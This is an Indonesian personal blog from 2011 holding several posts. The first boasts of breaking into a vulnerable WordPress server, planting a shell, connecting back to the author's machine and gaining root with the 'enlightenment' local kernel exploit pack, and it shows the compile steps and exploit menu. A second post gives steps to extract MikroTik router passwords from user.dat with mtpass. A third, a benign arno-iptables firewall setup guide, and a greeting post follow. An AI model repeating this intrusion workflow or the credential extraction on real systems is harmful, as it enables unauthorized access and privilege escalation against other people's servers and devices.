Monday, October 31, 2011

Monday, October 31, 2011 - No comments

Pagi Yang Cerah. Happy Rooting


Sekedar mencucurkan hati aja alias curhat xixixi, Senin, 31-10-2011.
Pagi-pagi iseng-iseng scan wp, weleh... Alhamdulillah masih dpt yg ngebugs ^_^ . Langsung gas poll aje deh, step by step ane lewati. Setelah berhasil pasang shell hmm wilih la kok karnelnya thn 2008 gak mikir panjang lebar langsung saja ane back konek/connect back, antara server vitcim ke kompi ane :) xixixi back konek gak ada masalah, kemudian ane langsung aja cari exploit karnel yakti local exploit root, di sini ane menggunakan elightenment <==

Setelah itu kita download filenya dengan cara :
Kemudian kita extrak saja dengan perintah :  
tar -zxvf namafile.tgz
Setelah kita extrak, maka akan membentuk 1 folder dengan nama enlightenment lalu masuk ke folder tersebut dengan : cd enlightenment
Lakukan sedikit perintah ini : sed -i '/turn_\(on\|off\)_wp();/d' exploit.c

Tidak usah panjang lebah langsung saja kita run exploitnya dengan perintah :
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...failed.
Compiling exp_wunderbar.c...OK.
Choose your exploit:
[0] Cheddar Bay: Linux 2.6.30/ /dev/net/tun local root
[1] MooseCox: Linux-2.X->Linux.2.6.31.unfixed pipe local root
[2] Paokara: Linux 2.6.19-> eCryptfs local root
[3] Powerglove: Linux 2.6.31 perf_counter local root
[4] The Rebel: Linux < 2.6.19 udp_sendmsg() local root
[5] Wunderbar Emporium: Linux 2.X sendpage() local root
[6] Exit
Disini saya pilih 4  untuk melakukan pwn karnel ^_^ hehehe, gotcha xixixi Alhamdulillah ya, langsung muncul tulisan no control jobs shell xixixi berarti kira sudah menjadi root :)

biar mantep ane screen shotkan ;)

Alhamdulillah yah sesuatu banget ^_^ , sekian. 


Sunday, October 30, 2011

Sunday, October 30, 2011 - No comments

Tips Lupa Password Mikrotik


Lupa Password Mikrotik bukan masalah lagi, sekarang sudah ada caranya tanpa harus install ulang, tapi mungkin menurut saya tidak semudah pada linux, kalo lupa password root/ admin-nya.

Cara 1 

Langkah – langkahnya seperti dibawah :
Boot menggunakan Live-CD, mount disk yang digunakan untuk mikrotik dan siapkan juga flasdik untuk menyimpan file yang dibutuhkan.
#mount /dev/hda1 /mnt
#mount /dev/sdb1 /media
#cp  /mnt/nova/store/ /media/    ( untuk mikrotik versi terbaru )
#cp  /mnt/rw/store/ /media/       ( untuk mikrotik versi Lama )

setelah file-nya tercopy selanjutnya ada aplikasi khusus yang digunakan untuk membaca isi file user.dat tapi harus pada os linux yang core / based-nya Debian, sebelum menginstall aplikasi yang dibutuhkan terlebih dahulu ada aplikasi pendukung yang harus tersedia pada os linux-nya.
#apt-get install libssl-dev
#cd /usr/local/src/
#tar -xvjf mtpass-0.5.tar.bz2

setelah di extract ada yang perlu ditambahkan pada file mtpass.cpp sebelum di compile, tamba #include <cstdio> lalu simpan kembali
#nano mtpass-0.5/mtpass.cpp
#include <cstdio>

compile mtpass, dan outputnya mtpass :
#g++ -lssl -lcrypto mtpass.cpp -o mtpass
#chmod +x mtpass

mount flashdisk dan jalankan mtpass :
#mount /dev/sdb1 /media
#./mtpass /media/user.dat
dan hasilnya :

Cara 2

Silakan kunjungi situs password recovery mikrotik di: wkwkk :) lebih mudah cara 2 yo toh xixixi ^_^ .

Sunday, October 30, 2011 - No comments

Configure a Firewall with Arno Iptables in Debian 5 (Lenny)


Firewall software is designed to limit access to network resources running on your Linux VPS to authorized parties. Some services, such as a public web server, may be accessible to anyone. Others might be more restricted, such as an SSH daemon for remote system administration.
This guide will help you get the arno-iptables-firewall package installed and configured under Debian 5 (Lenny). For purposes of this tutorial, we assume the user is logged in as root via SSH, and that the prerequisite steps in the getting started guide have already been followed.

Installing the Firewall 

Make sure your package repositories and installed programs are up to date by issuing the following commands:
apt-get update
apt-get upgrade --show-upgraded
Issue the following command in your terminal:
apt-get install arno-iptables-firewall
Configuring the Firewall
As part of the installation process, you'll be presented with a debconf dialog for
configuration.  Choose "Yes" to allow your configuration to be interactively managed 
by debconf: 


Enter the name of your external network interface. Linodes have eth0 by default.

Enter a list of TCP ports you'd like to be accessible through your Linode's public IP address, separated by spaces. In this example we've specified SSH, SMTP, HTTP, HTTPS, IMAPS and POP3S. You may wish to open additional ports if you run other public services on your VPS.

Specify the UDP ports you'd like to be open to the public in the same manner.

If you have a private IP address assigned to your Linode, you can specify the interface alias for it next. In this example, we're allowing all traffic from the private network range to the private interface alias eth0:0. You may fine-tune this later to only allow access from specific hosts on the backend network. If you don't have a private IP address configured, simply leave this field blank.

You will be asked whether the firewall should be started now. Answer "Yes" here and continue.

After the initial debconf dialog exits, a few packages that arno-iptables-firewall depends upon will be configured. You will be prompted to restart the firewall after the configuration is complete.

Your firewall should be functioning correctly at this point. You can reference the file /etc/arno-iptables-firewall/firewall.conf for additional configuration beyond the scope of the debconf dialogs. To start/stop/restart the firewall from the shell, use the command /etc/init.d/arno-iptables-firewall [start|stop|restart].

Friday, October 21, 2011

Friday, October 21, 2011 - No comments

Hello Word!


Dengan mengucap,ِسْمِ-اللهِ-الرَّحْمنِ-الرَّحِيم

Akan ku isi blog ini dengan semua yang ada di benak ku saat ini ^_^ .
